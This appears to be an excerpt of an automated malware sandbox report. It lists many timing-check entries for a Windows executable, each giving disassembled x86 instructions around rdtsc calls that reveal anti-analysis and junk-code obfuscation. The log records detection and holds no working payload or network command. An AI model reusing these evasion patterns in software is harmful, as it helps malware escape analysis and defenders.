Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DFF5F second address: 16DFF63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DFF63 second address: 16DFF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DFF69 second address: 16DFF6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E124C second address: 16E1256 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3E51171E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E1CA4 second address: 16E1CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E1EDB second address: 16E1EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E1EDF second address: 16E1F46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F3E511046A8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 pushad 0x00000029 sub dword ptr [ebp+12A01B9Ch], edi 0x0000002f mov edi, dword ptr [ebp+12A03357h] 0x00000035 popad 0x00000036 jnl 00007F3E511046B5h 0x0000003c jmp 00007F3E511046AFh 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E1F46 second address: 16E1F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E3AFC second address: 16E3B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E3B00 second address: 16E3B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E40C5 second address: 16E40D3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3E511046A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E4FC7 second address: 16E4FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E617A second address: 16E61EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F3E511046A8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F3E511046A8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 push 00000000h 0x00000044 mov bx, cx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b jl 00007F3E511046A6h 0x00000051 pop ecx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E52CB second address: 16E52CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E63F9 second address: 16E63FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E63FE second address: 16E640E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E73F5 second address: 16E7413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046B9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E8264 second address: 16E826F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3E51171E66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E7413 second address: 16E7418 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E7418 second address: 16E742E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007F3E51171E72h 0x0000000e jc 00007F3E51171E6Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E9485 second address: 16E9489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EB81B second address: 16EB885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F3E51171E68h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov di, bx 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+12A01ADDh], ecx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F3E51171E68h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 mov dword ptr [ebp+12A03342h], eax 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jnp 00007F3E51171E66h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E9489 second address: 16E949A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jne 00007F3E511046A6h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EB885 second address: 16EB889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EB889 second address: 16EB88F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16ED8F3 second address: 16ED8F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EBA7D second address: 16EBA87 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3E511046A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EEDE4 second address: 16EEE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+12A036CCh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F3E51171E68h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov dword ptr [ebp+12A03342h], ebx 0x00000031 push 00000000h 0x00000033 pushad 0x00000034 jg 00007F3E51171E69h 0x0000003a mov cx, di 0x0000003d popad 0x0000003e push eax 0x0000003f pushad 0x00000040 pushad 0x00000041 jmp 00007F3E51171E79h 0x00000046 jnc 00007F3E51171E66h 0x0000004c popad 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EE0BF second address: 16EE0C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EEE52 second address: 16EEE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EFF3D second address: 16EFFF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3E511046B6h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 jbe 00007F3E511046ACh 0x00000017 ja 00007F3E511046A6h 0x0000001d pop eax 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F3E511046A8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 mov dword ptr [ebp+12A01ADDh], eax 0x0000003f push 00000000h 0x00000041 call 00007F3E511046B9h 0x00000046 or dword ptr [ebp+12A02314h], eax 0x0000004c pop edi 0x0000004d push 00000000h 0x0000004f cmc 0x00000050 xchg eax, esi 0x00000051 jmp 00007F3E511046B6h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F3E511046ABh 0x0000005e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EFFF5 second address: 16EFFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F101A second address: 16F1020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F3EB8 second address: 16F3EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F4E63 second address: 16F4E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F4E69 second address: 16F4E6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F2F8B second address: 16F2FB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F3E511046B7h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F4E6F second address: 16F4E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F5E43 second address: 16F5E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F5E48 second address: 16F5E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F5E4E second address: 16F5E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F517C second address: 16F5181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FEC19 second address: 16FEC1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE31A second address: 16FE322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE322 second address: 16FE327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE327 second address: 16FE32D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE791 second address: 16FE797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE797 second address: 16FE7C1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3E51171E66h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jg 00007F3E51171E79h 0x00000014 jl 00007F3E51171E66h 0x0000001a jmp 00007F3E51171E6Dh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE7C1 second address: 16FE7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE7C7 second address: 16FE7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F3E51171E66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16A2010 second address: 16A201A instructions: 0x00000000 rdtsc 0x00000002 je 00007F3E511046ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1705109 second address: 170510E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1708D9B second address: 1708D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17092E9 second address: 17092EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709754 second address: 170975A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 170975A second address: 1709770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E51171E72h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17098C8 second address: 17098CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17098CC second address: 17098DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17098DF second address: 17098F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17098F5 second address: 17098F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709B9A second address: 1709BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3E511046A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709BA4 second address: 1709BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Ch 0x00000007 je 00007F3E51171E66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709BBA second address: 1709BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709BC1 second address: 1709BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F3E51171E70h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709BDA second address: 1709BE4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3E511046A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709BE4 second address: 1709BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F3E51171E86h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709BF7 second address: 1709C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709C02 second address: 1709C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709C06 second address: 1709C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709D3E second address: 1709D57 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3E51171E6Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1709D57 second address: 1709D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3E511046B0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1712CAF second address: 1712CCE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3E51171E66h 0x00000008 jng 00007F3E51171E66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F3E51171E6Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1712CCE second address: 1712CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1716EEC second address: 1716F13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F3E51171E75h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1716F13 second address: 1716F26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jnp 00007F3E511046C5h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1716F26 second address: 1716F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1715E4E second address: 1715E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA4D5 second address: 16DA504 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3E51171E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b xor dword ptr [esp], 10BD00A9h 0x00000012 mov edi, dword ptr [ebp+12A01ADDh] 0x00000018 push 9BD68C2Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F3E51171E70h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA57F second address: 16DA599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046B5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA5EF second address: 16DA5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA5F3 second address: 16DA5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA75B second address: 16DA78C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3E51171E6Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA78C second address: 16DA792 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA792 second address: 16DA7C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F3E51171E66h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F3E51171E7Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA7C3 second address: 16DA7C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA7C9 second address: 16DA7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA7CD second address: 16DA7D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA97E second address: 16DA982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA982 second address: 16DA988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
